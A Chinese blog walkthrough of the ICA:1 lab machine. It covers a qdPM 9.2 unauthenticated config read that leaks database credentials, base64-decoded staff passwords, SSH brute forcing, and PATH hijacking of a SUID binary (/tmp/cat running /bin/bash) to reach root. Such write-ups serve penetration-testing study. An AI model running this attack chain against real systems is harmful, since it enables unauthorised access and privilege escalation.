文章总结： 文章详述灵境靶机ICA的完整渗透流程：利用qdPM9.2未授权读取databases.yml拿到数据库口令，导出员工表base64密码后爆破解出SSH账号，再借SUID程序get_access的路径劫持提权至root，最终获flag并总结框架漏洞、弱密码与配置不当为三大突破口。 综合评分： 88 文章分类： 渗透测试,红队,漏洞分析,内网渗透,实战经验

灵境平台-vulnhub-ICA: 1-详解WP

Sec铁匠铺

2026年1月19日 09:00 云南

以下文章来源于鸽子洞安全实验室 ，作者咕咕咕zero0

鸽子洞安全实验室 .

一只白帽鸽的漏洞研究巢穴。🕳️专注深耕：渗透靶场实战 | 漏洞复现 | 红队工具|护网。我们挖掘、剖析、沉淀，让每一个“洞”都有回响。欢迎来到鸽子洞。

LingJing(灵境)靶机项目👇

靶场项目访问地址https://github.com/414aaj/LingJing网盘下载地址夸克：https://pan.quark.cn/s/e6f3a48329fb百度：https://pan.baidu.com/s/14mjUdqHhoSEfVqe2h9VqoQ?pwd=cz94

👇灵境平台公众号👇

靶机入口

靶机介绍：难度：简单描述：根据我们情报网络的消息，ICA 正在开展一个秘密项目。我们需要查明这个项目是什么。一旦你获取了访问信息，请将它们发送给我们。我们会植入一个后门以便后续访问该系统。你只需要专注于项目本身。你可能需要通过多层安全防护。机构对你成功完成此次任务充满信心。祝你好运，特工！

这篇文章的学习知识点主要包括以下内容：1. 渗透测试基础流程 ：从信息收集到权限提升的完整渗透测试过程2. qdpm 9.2框架漏洞利用 ：针对特定CMS框架的已知漏洞（未经验证账户的密码暴露）3. 信息收集技术 ：端口扫描（fsan）获取开放服务信息4. 漏洞搜索与利用 ：使用互联网查找可利用的漏洞EXP5. 数据库操作与利用 ：远程数据库登录与查询敏感信息提取（账户密码）base64加密数据的识别与解密6. 暴力破解技术 ：使用爆破工具对SSH服务进行用户名密码爆破7. 提权技术 ：查找具有SUID权限的可执行文件环境变量替换命令进行路径劫持提权8. Linux系统操作 ：文件权限设置、环境变量配置等基本操作

靶机配置：操作系统：Linux靶机IP：192.168.242.73攻击机IP：192.168.188.6Kali：192.168.188.140

复现过程：

信息收集：

我们先进行端口扫描，利用fscan_V2.0使用命令

fscan.exe -h 192.168.242.73

可以看到靶机的IP开放了80 22和3306端口

我们访问80端口的web页面

可以看到所使用是qdPM 9.2框架，我们在网上搜索该框架的漏洞发现未经验证账户的密码暴漏中发现存在我们可以直接读取/core/config/databases.yml文件，尝试读取下文件信息，获取到数据库账户名和密码

qdpmadmin/UcVQCMQk2STVeS6J

数据库信息收集和利用

我喜欢利用xshell来连接kali攻击机IP是192.168.188.140，具体怎么连接就不多赘述了。

通过获取的数据库账户名和密码：qdpmadmin/UcVQCMQk2STVeS6J登录数据库查看，登录命令

mysql -h 192.168.242.73 -uqdpmadmin -pUcVQCMQk2STVeS6J

登录进去并使用下面命令获取数据表信息，查看staff数据表信息。查看login数据表信息得到加密的密码，查看user数据表得到用户名账号

show databases;use staffshow tables;select * from login;select * from user;

获得用户名5个密码5个，我们对密码进行base64解密

suRJAdGwLp8dy3rF7ZwV4qtg42cmUXGXX7MQkP3W29fewHdCDJceVy98W28Y7wLgcqNnBWCByS2DuJSy

写入两个密码本

用户名前面的要换成小写一定要小写！！！

我们在启动ssh爆破软件

Week-passwd

爆破出来两个用户名和密码

dexter/7ZwV4qtg42cmUXGXtravis/DJceVy98W28Y7wLg

我们用xsell分别连接看看

第一个dexter

我们看到有一个文件访问一看是一段英文，翻译一下

应该是要提权我们使用id看看当前权限

果然不是root

我们先访问第二个用户travis看看有什么东西

看到存在一个flag

ICA{Secret_Project}

我们来进行提权，使用第一个账号

find / -perm -u=s 2>/dev/null

查看哪些文件有权限

发现一个可疑文件/opt/get_access

我们用字符串的方式来查看

cd /optstrings get_access

看到有一个可疑的文件

发现会以root权限查看文件，我们可以通过伪造一个文件名为cat的可执行文件，文件内容为/bin/bash，并将文件路径设置为环境变量，这样执行get_access的时候，就会执行我们伪造的cat文件，从而使我们获得root权限，那我们就可以自己设置一个cat命令写入环境变量，让其引用我们的cat命令即可执行我们写入的代码，执行get_access脚本，获得root权限。因为我们更改了cat命令，所以这时候使用more root.txt查看下文件的内容或者删除下/tmp/cat文件，然后cat root.txt查看为文件内容，成功获取到flag信息。

echo "/bin/bash" >/tmp/catchmod +x /tmp/catecho $PATHexport PATH=/tmp:$PATH/opt/get_accessid

我们来获取第二个flag

lscd /rootlsmore root.txt

ICA{Next_Generation_Self_Renewable_Genetics}

总结

核心漏洞在于：未修复的框架漏洞导致数据库凭证泄露；弱密码策略及密码明文存储使得SSH爆破成功；配置不当的SUID程序引发路径劫持，最终完成权限提升。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Sec铁匠铺 《灵境平台-vulnhub-ICA: 1-详解WP》